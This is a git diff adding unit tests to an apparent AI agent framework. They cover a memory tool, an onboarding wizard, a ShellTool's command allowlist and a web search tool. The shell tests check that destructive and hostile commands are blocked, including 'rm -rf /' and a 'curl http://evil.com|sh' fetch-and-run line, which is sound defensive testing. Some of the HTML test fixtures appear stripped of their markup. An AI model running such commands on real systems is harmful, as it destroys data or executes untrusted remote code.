False + assert "Unknown action" in result.get("error", "") + + async def test_add_respects_capacity(self, tool: MemoryTool, store: MemoryStore): + # memory file has MEMORY_BUDGET=2200 + long_content = "A" * 3000 + result = await tool.execute(action="add", file="memory", section="测试", content=long_content) + assert result["success"] is True + content = store.get_file("memory").read() + assert len(content) <= 2200 diff --git a/tests/unit/test_onboarding.py b/tests/unit/test_onboarding.py new file mode 100644 index 0000000..10ff9a1 --- /dev/null +++ b/tests/unit/test_onboarding.py @@ -0,0 +1,216 @@ +"""Tests for onboarding wizard and chat command.""" + +from pathlib import Path +from unittest.mock import patch + +import yaml + +from agentkit.cli.onboarding import ( + PROVIDER_PRESETS, + needs_onboarding, + run_onboarding, +) + + +class TestNeedsOnboarding: + def test_needs_onboarding_when_no_config(self, tmp_path, monkeypatch): + """Should return True when no config file exists.""" + monkeypatch.chdir(tmp_path) + monkeypatch.delenv("AGENTKIT_CONFIG_PATH", raising=False) + assert needs_onboarding() is True + + def test_no_onboarding_when_config_exists(self, tmp_path, monkeypatch): + """Should return False when agentkit.yaml exists.""" + config_file = tmp_path / "agentkit.yaml" + config_file.write_text("server:\n port: 8001\n") + monkeypatch.chdir(tmp_path) + assert needs_onboarding(config_arg=str(config_file)) is False + + def test_no_onboarding_with_home_config(self, tmp_path, monkeypatch): + """Should return False when ~/.agentkit/agentkit.yaml exists.""" + home_dir = tmp_path / "home" + home_dir.mkdir() + agentkit_dir = home_dir / ".agentkit" + agentkit_dir.mkdir() + (agentkit_dir / "agentkit.yaml").write_text("server:\n port: 8001\n") + monkeypatch.setenv("HOME", str(home_dir)) + monkeypatch.chdir(tmp_path / "empty" if (tmp_path / "empty").exists() else tmp_path) + # Create empty cwd to ensure no local config + empty_dir = tmp_path / "empty" + empty_dir.mkdir() + monkeypatch.chdir(empty_dir) + assert needs_onboarding() is False + + +class TestProviderPresets: + def test_all_presets_have_required_fields(self): + """Every provider preset must have name, env_key, base_url, models.""" + for key, preset in PROVIDER_PRESETS.items(): + assert "name" in preset, f"{key} missing name" + assert "env_key" in preset, f"{key} missing env_key" + assert "base_url" in preset, f"{key} missing base_url" + assert "models" in preset, f"{key} missing models" + assert preset["models"], f"{key} has empty models" + assert "default_model" in preset, f"{key} missing default_model" + + def test_preset_keys_are_lowercase(self): + """Provider keys should be lowercase.""" + for key in PROVIDER_PRESETS: + assert key == key.lower(), f"Provider key '{key}' should be lowercase" + + def test_deepseek_preset(self): + """DeepSeek preset should have correct configuration.""" + ds = PROVIDER_PRESETS["deepseek"] + assert ds["env_key"] == "DEEPSEEK_API_KEY" + assert "deepseek-chat" in ds["models"] + assert ds["type"] == "openai" + + def test_qwen_preset(self): + """Qwen preset should use DashScope endpoint.""" + qwen = PROVIDER_PRESETS["qwen"] + assert "dashscope" in qwen["base_url"] + assert qwen["env_key"] == "DASHSCOPE_API_KEY" + + +class TestRunOnboarding: + def test_onboarding_generates_config_files(self, tmp_path, monkeypatch): + """Onboarding should generate agentkit.yaml and .env.""" + monkeypatch.chdir(tmp_path) + monkeypatch.setenv("HOME", str(tmp_path / "home")) + (tmp_path / "home").mkdir(exist_ok=True) + + # Mock user input + with patch("agentkit.cli.onboarding.Prompt") as mock_prompt, \ + patch("agentkit.cli.onboarding.Confirm") as mock_confirm: + # Step 1: Select DeepSeek (option 1) + # Step 2: API key + # Step 2b: Select model (1 = deepseek-chat, default) + # Step 5: Agent personality (name, personality, speaking_style) + mock_prompt.ask.side_effect = ["1", "sk-test-deepseek-key", "1", "小王", "友好耐心", "简洁专业"] + # Step 3: No second provider + mock_confirm.ask.return_value = False + + config_path = run_onboarding(output_dir=str(tmp_path)) + + assert config_path is not None + assert Path(config_path).exists() + + # Verify agentkit.yaml content + with open(config_path) as f: + config = yaml.safe_load(f) + assert "llm" in config + assert "deepseek" in config["llm"]["providers"] + assert config["llm"]["providers"]["deepseek"]["base_url"] == "https://api.deepseek.com/v1" + + # Verify .env content + env_path = tmp_path / ".env" + assert env_path.exists() + env_content = env_path.read_text() + assert "DEEPSEEK_API_KEY=sk-test-deepseek-key" in env_content + + def test_onboarding_with_two_providers(self, tmp_path, monkeypatch): + """Onboarding should support adding a second provider.""" + monkeypatch.chdir(tmp_path) + monkeypatch.setenv("HOME", str(tmp_path / "home")) + (tmp_path / "home").mkdir(exist_ok=True) + + with patch("agentkit.cli.onboarding.Prompt") as mock_prompt, \ + patch("agentkit.cli.onboarding.Confirm") as mock_confirm: + # Select DeepSeek (1), API key, model (1), then Qwen as second + # After removing deepseek, remaining = [openai, bailian-coding, qwen, doubao, gemini, anthropic] + # qwen is at index 2, so option 3 + # Step 5: Agent personality defaults + mock_prompt.ask.side_effect = ["1", "sk-deepseek", "1", "3", "sk-dashscope", "1", "AgentKit", "专业、友好、注重细节", "简洁清晰"] + mock_confirm.ask.return_value = True + + config_path = run_onboarding(output_dir=str(tmp_path)) + + with open(config_path) as f: + config = yaml.safe_load(f) + + providers = config["llm"]["providers"] + assert "deepseek" in providers + assert "qwen" in providers + + env_path = tmp_path / ".env" + env_content = env_path.read_text() + assert "DEEPSEEK_API_KEY=sk-deepseek" in env_content + assert "DASHSCOPE_API_KEY=sk-dashscope" in env_content + + def test_onboarding_cancelled_on_empty_api_key(self, tmp_path, monkeypatch): + """Onboarding should return None if API key is empty.""" + monkeypatch.chdir(tmp_path) + + with patch("agentkit.cli.onboarding.Prompt") as mock_prompt: + mock_prompt.ask.side_effect = ["1", ""] # Empty API key + + result = run_onboarding(output_dir=str(tmp_path)) + + assert result is None + + def test_onboarding_config_has_memory_backend(self, tmp_path, monkeypatch): + """Generated config should use memory backends by default.""" + monkeypatch.chdir(tmp_path) + monkeypatch.setenv("HOME", str(tmp_path / "home")) + (tmp_path / "home").mkdir(exist_ok=True) + + with patch("agentkit.cli.onboarding.Prompt") as mock_prompt, \ + patch("agentkit.cli.onboarding.Confirm") as mock_confirm: + mock_prompt.ask.side_effect = ["1", "sk-test-key", "1", "AgentKit", "专业、友好、注重细节", "简洁清晰"] + mock_confirm.ask.return_value = False + + config_path = run_onboarding(output_dir=str(tmp_path)) + + with open(config_path) as f: + config = yaml.safe_load(f) + + assert config["session"]["backend"] == "memory" + assert config["bus"]["backend"] == "memory" + assert config["task_store"]["backend"] == "memory" + + +class TestOnboardingSoulGeneration: + """U5: Onboarding 生成 SOUL.md 测试.""" + + def test_onboarding_creates_soul_md(self, tmp_path, monkeypatch): + """Onboarding should create SOUL.md with custom agent name.""" + monkeypatch.chdir(tmp_path) + home_dir = tmp_path / "home" + home_dir.mkdir(exist_ok=True) + monkeypatch.setenv("HOME", str(home_dir)) + + with patch("agentkit.cli.onboarding.Prompt") as mock_prompt, \ + patch("agentkit.cli.onboarding.Confirm") as mock_confirm: + mock_prompt.ask.side_effect = ["1", "sk-test-key", "1", "小王", "友好耐心", "简洁专业"] + mock_confirm.ask.return_value = False + + run_onboarding(output_dir=str(tmp_path)) + + # Verify SOUL.md was created + soul_path = home_dir / ".agentkit" / "SOUL.md" + assert soul_path.exists() + soul_content = soul_path.read_text(encoding="utf-8") + assert "小王" in soul_content + assert "友好耐心" in soul_content + assert "简洁专业" in soul_content + + def test_onboarding_soul_with_defaults(self, tmp_path, monkeypatch): + """Onboarding with default personality should create default SOUL.md.""" + monkeypatch.chdir(tmp_path) + home_dir = tmp_path / "home" + home_dir.mkdir(exist_ok=True) + monkeypatch.setenv("HOME", str(home_dir)) + + with patch("agentkit.cli.onboarding.Prompt") as mock_prompt, \ + patch("agentkit.cli.onboarding.Confirm") as mock_confirm: + # Prompt.ask returns the default value when user presses Enter + # Our mock needs to return the actual default values + mock_prompt.ask.side_effect = ["1", "sk-test-key", "1", "AgentKit", "专业、友好、注重细节", "简洁清晰"] + mock_confirm.ask.return_value = False + + run_onboarding(output_dir=str(tmp_path)) + + soul_path = home_dir / ".agentkit" / "SOUL.md" + assert soul_path.exists() + soul_content = soul_path.read_text(encoding="utf-8") + assert "AgentKit" in soul_content diff --git a/tests/unit/test_shell_tool.py b/tests/unit/test_shell_tool.py new file mode 100644 index 0000000..90820aa --- /dev/null +++ b/tests/unit/test_shell_tool.py @@ -0,0 +1,155 @@ +"""Unit tests for ShellTool — command execution with safety controls.""" + +import asyncio +import pytest + +from agentkit.tools.shell import ShellTool, DEFAULT_ALLOWED_COMMANDS, BLOCKED_PATTERNS + + +class TestShellToolSchema: + """Test schema definitions.""" + + def test_input_schema_has_required_fields(self): + tool = ShellTool() + schema = tool.input_schema + assert "command" in schema["properties"] + assert "command" in schema["required"] + assert "timeout" in schema["properties"] + assert "working_dir" in schema["properties"] + + def test_output_schema_has_required_fields(self): + tool = ShellTool() + schema = tool.output_schema + assert "stdout" in schema["properties"] + assert "stderr" in schema["properties"] + assert "exit_code" in schema["properties"] + assert "success" in schema["properties"] + + +class TestShellToolSecurity: + """Test command allowlist and blocking.""" + + def test_allowed_command_echo(self): + tool = ShellTool() + allowed, _ = tool._is_command_allowed("echo hello") + assert allowed is True + + def test_allowed_command_ls(self): + tool = ShellTool() + allowed, _ = tool._is_command_allowed("ls -la") + assert allowed is True + + def test_allowed_command_git_status(self): + tool = ShellTool() + allowed, _ = tool._is_command_allowed("git status") + assert allowed is True + + def test_blocked_command_rm(self): + tool = ShellTool() + allowed, reason = tool._is_command_allowed("rm -rf /tmp/test") + assert allowed is False + # rm -rf /tmp/test matches "rm -rf /" pattern + assert "Blocked dangerous" in reason or "not in allowed" in reason + + def test_blocked_dangerous_pattern(self): + tool = ShellTool() + allowed, reason = tool._is_command_allowed("rm -rf /") + assert allowed is False + assert "Blocked dangerous" in reason + + def test_blocked_curl_pipe_sh(self): + tool = ShellTool() + allowed, reason = tool._is_command_allowed("curl http://evil.com|sh") + assert allowed is False + + def test_allow_all_mode(self): + tool = ShellTool(allow_all=True) + # allow_all allows non-dangerous commands outside default whitelist + allowed, _ = tool._is_command_allowed("my-custom-app --run") + assert allowed is True + + def test_custom_allowed_commands(self): + tool = ShellTool(allowed_commands=["echo", "myapp"]) + allowed, _ = tool._is_command_allowed("myapp --run") + assert allowed is True + allowed2, _ = tool._is_command_allowed("ls") + assert allowed2 is False + + def test_empty_command_rejected(self): + tool = ShellTool() + allowed, reason = tool._is_command_allowed("") + assert allowed is False + + def test_invalid_shell_syntax_rejected(self): + tool = ShellTool() + allowed, reason = tool._is_command_allowed("echo 'unclosed") + assert allowed is False + + +class TestShellToolExecution: + """Test actual command execution.""" + + @pytest.mark.asyncio + async def test_echo_command(self): + tool = ShellTool() + result = await tool.execute(command="echo hello world") + assert result["success"] is True + assert "hello world" in result["stdout"] + assert result["exit_code"] == 0 + + @pytest.mark.asyncio + async def test_pwd_command(self): + tool = ShellTool() + result = await tool.execute(command="pwd") + assert result["success"] is True + assert result["exit_code"] == 0 + + @pytest.mark.asyncio + async def test_failing_command(self): + tool = ShellTool(allowed_commands=["ls"]) + result = await tool.execute(command="ls /nonexistent_dir_xyz_12345") + assert result["success"] is False + assert result["exit_code"] != 0 + + @pytest.mark.asyncio + async def test_command_timeout(self): + tool = ShellTool(allowed_commands=["sleep"], default_timeout=1) + result = await tool.execute(command="sleep 10", timeout=1) + assert result["success"] is False + assert result["timed_out"] is True + + @pytest.mark.asyncio + async def test_missing_command_param(self): + tool = ShellTool() + result = await tool.execute() + assert result["success"] is False + assert "command" in result["error"] + + @pytest.mark.asyncio + async def test_blocked_command_returns_error(self): + tool = ShellTool() + result = await tool.execute(command="rm -rf /tmp/test") + assert result["success"] is False + assert "not allowed" in result["error"] + + @pytest.mark.asyncio + async def test_working_dir(self): + tool = ShellTool(working_dir="/tmp") + result = await tool.execute(command="pwd") + assert result["success"] is True + assert "/tmp" in result["stdout"] + + @pytest.mark.asyncio + async def test_output_truncation(self): + tool = ShellTool(max_output_length=50, allowed_commands=["python3"]) + # Generate long output + result = await tool.execute(command="python3 -c \"print('x' * 1000)\"") + assert result["success"] is True + assert len(result["stdout"]) < 200 # Truncated + message + assert "truncated" in result.get("stdout", "") or result.get("truncated") is True + + @pytest.mark.asyncio + async def test_stderr_captured(self): + tool = ShellTool(allowed_commands=["python3"]) + result = await tool.execute(command="python3 -c \"import sys; print('error', file=sys.stderr)\"") + assert "error" in result["stderr"] diff --git a/tests/unit/test_web_search_tool.py b/tests/unit/test_web_search_tool.py new file mode 100644 index 0000000..e1b2f92 --- /dev/null +++ b/tests/unit/test_web_search_tool.py @@ -0,0 +1,172 @@ +"""Unit tests for WebSearchTool — multi-backend web search.""" + +import pytest +from unittest.mock import AsyncMock, patch, MagicMock + +from agentkit.tools.web_search import WebSearchTool + + +class TestWebSearchToolSchema: + """Test schema definitions.""" + + def test_input_schema_has_required_fields(self): + tool = WebSearchTool() + schema = tool.input_schema + assert "query" in schema["properties"] + assert "query" in schema["required"] + assert "max_results" in schema["properties"] + + def test_output_schema_has_required_fields(self): + tool = WebSearchTool() + schema = tool.output_schema + assert "results" in schema["properties"] + assert "total" in schema["properties"] + "backend" in schema["properties"] + assert "success" in schema["properties"] + + +class TestWebSearchToolValidation: + """Test input validation.""" + + @pytest.mark.asyncio + async def test_missing_query(self): + tool = WebSearchTool() + result = await tool.execute() + assert result["success"] is False + assert "query" in result["error"] + + @pytest.mark.asyncio + async def test_empty_query(self): + tool = WebSearchTool() + result = await tool.execute(query="") + assert result["success"] is False + + +class TestWebSearchToolDuckDuckGo: + """Test DuckDuckGo fallback parsing.""" + + def test_parse_html_with_results(self): + html = """ + + Result 1 Title + Snippet for result 1 + Result 2 Title + Snippet for result 2 + + """ + results = WebSearchTool._parse_duckduckgo_html(html, 5) + assert len(results) == 2 + assert results[0]["title"] == "Result 1 Title" + assert results[0]["url"] == "https://example.com/result1" + assert results[0]["snippet"] == "Snippet for result 1" + + def test_parse_html_empty(self): + results = WebSearchTool._parse_duckduckgo_html("", 5) + assert results == [] + + def test_parse_html_skips_duckduckgo_links(self): + html = """ + Internal + Good Result + Good snippet + """ + results = WebSearchTool._parse_duckduckgo_html(html, 5) + assert len(results) == 1 + assert results[0]["url"] == "https://example.com/good" + + def test_parse_html_max_results(self): + html = "" + for i in range(10): + html += f'Title {i}\n' + html += f'Snippet {i}\n' + results = WebSearchTool._parse_duckduckgo_html(html, 3) + assert len(results) == 3 + + +class TestWebSearchToolTavily: + """Test Tavily API backend.""" + + @pytest.mark.asyncio + async def test_tavily_success(self): + tool = WebSearchTool(tavily_api_key="test-key") + + mock_response = MagicMock() + mock_response.json.return_value = { + "results": [ + {"title": "Test", "url": "https://example.com", "content": "Test content"}, + ] + } + mock_response.raise_for_status = MagicMock() + + with patch("httpx.AsyncClient") as mock_client_cls: + mock_client = AsyncMock() + mock_client.post = AsyncMock(return_value=mock_response) + mock_client.__aenter__ = AsyncMock(return_value=mock_client) + mock_client.__aexit__ = AsyncMock(return_value=None) + mock_client_cls.return_value = mock_client + + result = await tool.execute(query="test query") + assert result["success"] is True + assert result["backend"] == "tavily" + assert len(result["results"]) == 1 + + @pytest.mark.asyncio + async def test_tavily_failure_falls_back(self): + tool = WebSearchTool(tavily_api_key="test-key") + + with patch.object(tool, "_search_tavily", return_value={"success": False, "error": "API error", "results": [], "total": 0}): + with patch.object(tool, "_search_duckduckgo", return_value={"results": [], "total": 0, "backend": "duckduckgo", "success": True}): + result = await tool.execute(query="test") + assert result["backend"] == "duckduckgo" + + +class TestWebSearchToolSerper: + """Test Serper API backend.""" + + @pytest.mark.asyncio + async def test_serper_success(self): + tool = WebSearchTool(serper_api_key="test-key") + + mock_response = MagicMock() + mock_response.json.return_value = { + "organic": [ + {"title": "Test", "link": "https://example.com", "snippet": "Test snippet"}, + ] + } + mock_response.raise_for_status = MagicMock() + + with patch("httpx.AsyncClient") as mock_client_cls: + mock_client = AsyncMock() + mock_client.post = AsyncMock(return_value=mock_response) + mock_client.__aenter__ = AsyncMock(return_value=mock_client) + mock_client.__aexit__ = AsyncMock(return_value=None) + mock_client_cls.return_value = mock_client + + result = await tool.execute(query="test query") + assert result["success"] is True + assert result["backend"] == "serper" + assert len(result["results"]) == 1 + + +class TestWebSearchToolPriority: + """Test backend priority and fallback chain.""" + + @pytest.mark.asyncio + async def test_tavily_over_serper(self): + """Tavily should be tried before Serper when both keys are available.""" + tool = WebSearchTool(tavily_api_key="t-key", serper_api_key="s-key") + + with patch.object(tool, "_search_tavily", return_value={"results": [], "total": 0, "backend": "tavily", "success": True}) as mock_tavily: + result = await tool.execute(query="test") + mock_tavily.assert_called_once() + assert result["backend"] == "tavily" + + @pytest.mark.asyncio + async def test_no_keys_uses_duckduckgo(self): + """Without API keys, DuckDuckGo is used directly.""" + tool = WebSearchTool() + + with patch.object(tool, "_search_duckduckgo", return_value={"results": [], "total": 0, "backend": "duckduckgo", "success": True}) as mock_ddg: + result = await tool.execute(query="test") + mock_ddg.assert_called_once() + assert result["backend"] == "duckduckgo"